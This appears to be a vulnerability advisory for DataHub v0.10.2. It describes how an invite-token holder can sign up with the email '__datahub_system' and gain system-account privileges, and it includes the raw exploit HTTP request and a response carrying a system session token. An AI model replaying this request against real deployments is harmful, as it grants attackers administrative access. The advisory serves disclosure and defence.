Summary
Missing input validation in the user signup form allows an attacker to register an account with the "email" __datahub_system.
An attacker with a valid invite token can create such an account and elevate their privileges to the system account.
Details
- Tested with the Datahub quickstart docker-compose file.
- Tested on version
v0.10.2
- Tested with the environment variable
METADATA_SERVICE_AUTH_ENABLED=true set in the frontend and GMS container.
PoC
The raw HTTP requests can be seen in the last "References" section
- The attacker requires a valid invite token. Following screenshot illustrates how an invite token with "No Role" is created
- The attacker can sign up a user with the email
__datahub_system. This account creation is successful and attacker gets a valid session cookie/token with the __datahub_system actor (see following screenshot)
- The attacker can use this Cookie to access administrative APIs. For example, create an access token for the
__datahub_system account
Impact
This is a privilege escalation vulnerability which allows an attacker with a valid invite token to elevate their privileges from No Role to __datahub_system
References
Signup HTTP request
POST /signUp HTTP/1.1
Host: localhost:9002
Content-Length: 149
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "macOS"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Testuser1
Content-Type: application/json
Accept: */*
Origin: http://localhost:9002
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9002/signup?invite_token=onyyqvpbgchmyosptbwlimylughnnrbc
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: bid=f5cf3cbe-752b-44f1-b61a-33d32e01b067
Connection: close
{"fullName":"test3","email":"__datahub_system","password":"attackerPassword!","title":"Data Scientist","inviteToken":"onyyqvpbgchmyosptbwlimylughnnrbc"}Signup HTTP response
HTTP/1.1 200 OK
Set-Cookie: PLAY_SESSION=41fdaca382e66e81909d903c83d24cc6f633299c-actor=urn%3Ali%3Acorpuser%3A__datahub_system&token=eyJhbGciOiJIUzI1NiJ9.eyJhY3RvclR5cGUiOiJVU0VSIiwiYWN0b3JJZCI6Il9fZGF0YWh1Yl9zeXN0ZW0iLCJ0eXBlIjoiU0VTU0lPTiIsInZlcnNpb24iOiIxIiwianRpIjoiYTc2OTA4MjQtMzVmZC00OWQ5LWIwZTMtN2EyMmQ0NjFkZGQ5Iiwic3ViIjoiX19kYXRhaHViX3N5c3RlbSIsImV4cCI6MTY4MjY3NDg0OCwiaXNzIjoiZGF0YWh1Yi1tZXRhZGF0YS1zZXJ2aWNlIn0.E7_x2Wta9Wlp3NT98D3WZwtogGr5dIpbRahjaJWYZEQ; SameSite=Lax; Path=/; HTTPOnly
Set-Cookie: actor=urn:li:corpuser:__datahub_system; Max-Age=2592000; Expires=Sat, 27 May 2023 09:40:48 GMT; SameSite=Lax; Path=/
Date: Thu, 27 Apr 2023 09:40:48 GMT
Connection: close
Content-Length: 0
timoles Reporter
Summary
Missing input validation in the user signup form allows an attacker to register an account with the "email"
__datahub_system.An attacker with a valid invite token can create such an account and elevate their privileges to the system account.
Details
v0.10.2METADATA_SERVICE_AUTH_ENABLED=trueset in the frontend and GMS container.PoC
The raw HTTP requests can be seen in the last "References" section
__datahub_system. This account creation is successful and attacker gets a valid session cookie/token with the__datahub_systemactor (see following screenshot)__datahub_systemaccountImpact
This is a privilege escalation vulnerability which allows an attacker with a valid invite token to elevate their privileges from
No Roleto__datahub_systemReferences
Signup HTTP request
Signup HTTP response